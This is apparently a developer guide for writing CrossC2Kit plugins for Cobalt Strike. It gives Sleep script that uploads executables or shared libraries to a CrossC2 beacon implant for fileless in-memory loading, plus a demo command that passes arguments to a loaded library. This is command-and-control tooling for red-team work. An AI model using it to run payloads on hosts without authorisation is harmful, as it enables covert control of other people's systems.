cna编写说明

首先是CrossC2Kit定义的公共基础函数,最终由 bcrossc2_load_dyn 函数负责向 CrossC2 beacon 下发需要内存无文件加载的可执行文件或者动态库, 以及运行时需要传入的参数(各参数以 '^' 分隔,因此参数本身不能包含 '^')。

include(script_resource("CrossC2Kit.cna"));

CrossC2Kit.cna:

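sub random_string {
    # <3 @offsec_ginger
    # Return $1 random ASCII letters (a-z, A-Z). CrossC2Kit uses this as a
    # per-task name suffix. Sleep's rand() is not a CSPRNG, so do not reuse
    # this for anything that must be unguessable. A missing or zero $1
    # yields "".
    #
    # Sleep variables are global unless declared with local(); without it the
    # loop counter and scratch variables would clobber the caller's globals.
    local('$limit $alphabet @chars $i');
    $limit = $1;
    $alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    @chars = @();
    for ($i = 0; $i < $limit; $i++) {
        # rand(n) returns an integer in [0, n), so charAt() is always in range
        add(@chars, charAt($alphabet, rand(strlen($alphabet))));
    }
    return join('', @chars);
}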

sub runType {
    # Map a CrossC2 file-type label to the run-mode code the beacon expects:
    # "0" for executables (ELF, MachO), "1" for shared libraries (so, dylib).
    # Any other label returns -1 so the caller can refuse the task.
    local('$kind %code');
    $kind = $1;
    %code = %("ELF" => "0", "MachO" => "0", "so" => "1", "dylib" => "1");
    if ($kind in %code) {
        return %code[$kind];
    }
    return -1;
}

sub genTaskinfo_dyn {
    # Build the task descriptor the CrossC2 beacon parses:
    #   CrossC2^<taskType>^<taskName>^<resType>^<size>^<transportArgs>
    # '^' is the field delimiter, so a '^' inside any field (in practice the
    # transport args, $5) shifts the fields the beacon sees. Callers join
    # multiple runtime arguments with '^' on purpose.
    local('@fields');
    @fields = @("CrossC2", $1, $2, $3, $4, $5);
    return join("^", @fields);
}

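sub bcrossc2_load_dyn {
    # Send an executable or shared library to a CrossC2 beacon for in-memory
    # (fileless) loading.
    #   $1 beacon id
    #   $2 file type label: ELF, MachO, so, dylib (see runType)
    #   $3 task name; a 4-letter random suffix is appended
    #   $4 task result type
    #   $5 payload file name, resolved relative to this script via script_resource()
    #   $6 runtime arguments, already joined with '^' by the caller
    # Reports failures with berror() and returns without uploading.
    local('$beaconid $taskType $taskName $taskResType $loadFileName $taskArgs');
    local('$path $handle $juicyData $juicySize $typeCode $taskinfo $error');
    $beaconid = $1;
    $taskType = $2;
    $taskName = $3 . random_string(4);
    $taskResType = $4;
    $loadFileName = $5;
    $taskArgs = $6;

    # Validate the type before touching the file: the original only logged the
    # error and still uploaded a descriptor with type -1 to the beacon.
    $typeCode = runType($taskType);
    if ($typeCode == -1) {
        berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
        return;
    }

    $path = script_resource($loadFileName);
    if (!-exists $path) {
        berror($beaconid, "[ CrossC2 ]: payload file not found: $path");
        return;
    }

    $handle = openf($path);
    if (checkError($error)) {
        berror($beaconid, "[ CrossC2 ]: unable to open $path - $error");
        return;
    }
    $juicyData = readb($handle, -1); # -1: read the whole file
    closef($handle);
    $juicySize = lof($path);

    $taskinfo = genTaskinfo_dyn($typeCode, $taskName, $taskResType, $juicySize, $taskArgs);
    bupload_raw($beaconid, $taskinfo, $juicyData);
}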

下面将编写一个 “传入参数解析” 功能的 .cna 插件 demo

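include(script_resource("CrossC2Kit.cna"));

# Demo task: hand three arguments to a shared library loaded in memory on the
# beacon. Registered as an SSH command because CrossC2 beacons are exposed as
# SSH sessions in the Cobalt Strike client.
ssh_alias cc2_parseArgs {
    local('$taskName $taskType $taskResType $loadlib $beaconid $arg1 $arg2 $arg3 $transportArg');
    $taskName = "cc2_parseArgs";    # task name; CrossC2Kit appends a random suffix
    $taskType = "so";               # $taskType -> ELF, MachO, so, dylib
    $taskResType = "info";          # result type; see the "variable definitions" section
    $loadlib = "test_parseArgs.so"; # shared library / executable to load in memory

    $beaconid = $1;

    # Require all three arguments: otherwise the descriptor sent to the beacon
    # contains empty fields, which the original silently allowed.
    if ($4 is $null) {
        berror($beaconid, "Use: cc2_parseArgs arg1 arg2 arg3");
        return;
    }
    $arg1 = $2;
    $arg2 = $3;
    $arg3 = $4;

    # '^' is the field delimiter of the task descriptor, so the runtime
    # arguments are joined with '^'. An argument that itself contains '^'
    # will be split by the beacon into extra fields.
    $transportArg = $arg1 . "^" . $arg2 . "^" . $arg3;

    blog($beaconid, "cc2_parseArgs: " . $arg1 . " " . $arg2 . " " . $arg3);

    bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
}

ssh_command_register("cc2_parseArgs", "CrossC2 dynamic run in memory demo", "Use: cc2_parseArgs arg1 arg2 arg3");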
